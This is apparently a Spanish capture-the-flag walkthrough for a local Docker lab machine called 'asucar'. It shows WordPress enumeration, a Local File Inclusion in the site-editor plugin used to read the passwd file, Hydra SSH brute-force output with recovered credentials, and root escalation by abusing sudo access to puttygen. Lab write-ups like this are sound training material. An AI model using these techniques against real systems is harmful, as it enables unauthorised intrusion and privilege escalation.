Cuando obtenemos el .zip nos lo pasamos al entorno en el que vamos a empezar a hackear la maquina y haremos lo siguiente.
unzipasucar.zip
Nos lo descomprimira y despues montamos la maquina de la siguiente forma.
bashauto_deploy.shasucar.tar
Info:
Estamos habilitando el servicio de docker. Espere un momento...
Synchronizing state of docker.service with SysV service script with /usr/lib/systemd/systemd-sysv-install.
Executing: /usr/lib/systemd/systemd-sysv-install enable docker
Docker ha sido instalado correctamente.
Estamos desplegando la máquina vulnerable, espere un momento.
Máquina desplegada, su dirección IP es --> 172.17.0.2
Presiona Ctrl+C cuando termines con la máquina para eliminarla
Por lo que cuando terminemos de hackearla, le damos a Ctrl+C y nos eliminara la maquina para que no se queden archivos basura.
Escaneo de puertos
Info:
Gobuster
Info:
Por lo que vemos tiene un wordpress por lo que haremos lo siguiente, si miramos en el codigo fuente del wordpress vemos que nos viene un dominio llamado asucar.dl por lo que editaremos lo siguiente.
Lo guardamos y ahora ponemos lo siguiente para irnos al login de wordpress.
Y esto nos llevara al login, por lo que hemos visto antes hay un nombre de usuario llamado wordpress y si lo probamos nos dira que existe pero que la contraseña no es correcta, por lo que haremos lo siguiente.
Info:
Nos dira lo que ya sabemos que hay un usuario llamado wordpress.
Info:
Si hacemos esto no nos descubrira nada, pero si vemos que hay un plugin llamado site-editor y si buscamos un exploit del mismo veremos que hay un Local File Inclusion por lo que haremos lo siguiente.
URL = https://www.exploit-db.com/exploits/44340
Si nos vamos a la siguiente direccion URL, podremos ver el passwd de la maquina victima aprovechando esta vulnerabilidad del plugin.
Info:
Vemos que hay un usuario que se llama curiosito por lo que probaremos a hacer fuerza bruta con hydra.
hydra
Info:
Y por lo que vemos encontramos las credenciales del usuario.
SSH
Metemos la contarseña y ya estariamos dentro de la maquina.
Privilege Escalation
Si hacemos sudo -l podemos ver lo siguiente.
Podremos ejecutar puttygen como root por lo que haremos lo siguiente.
Generaremos una clave id_rsa en la carpeta de root siendo la clave del ssh de root.
Y ahora copiaremos esa clave id_rsa al directorio actual en el que estamos utilizando el sudo ya que podemos hacerlo.
Y tendremos la id_rsa ya en nuestro directorio, por lo que haremos lo siguiente.
Haciendo esto nos habremos conectado por ssh con el usuario root con la id_rsa que generamos y copiamos a nuestra carpeta, por lo que ya seremos root.
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-08-07 09:08:30
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking ssh://172.17.0.2:22/
[22][ssh] host: 172.17.0.2 login: curiosito password: password1
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 22 final worker threads did not complete until end.
[ERROR] 22 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-08-07 09:08:33
User = curiosito
Pass = password1
ssh curiosito@<IP>
Matching Defaults entries for curiosito on b1ef8aba7ba2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User curiosito may run the following commands on b1ef8aba7ba2:
(root) NOPASSWD: /usr/bin/puttygen
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ED25519 key fingerprint is SHA256:uxPuaJueTWTbzOOOgHR9jKEuKfQzpWt1rU8JihuRr4o.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'localhost' (ED25519) to the list of known hosts.
Linux b1ef8aba7ba2 6.6.9-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.6.9-1kali1 (2024-01-08) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@b1ef8aba7ba2:~# whoami
root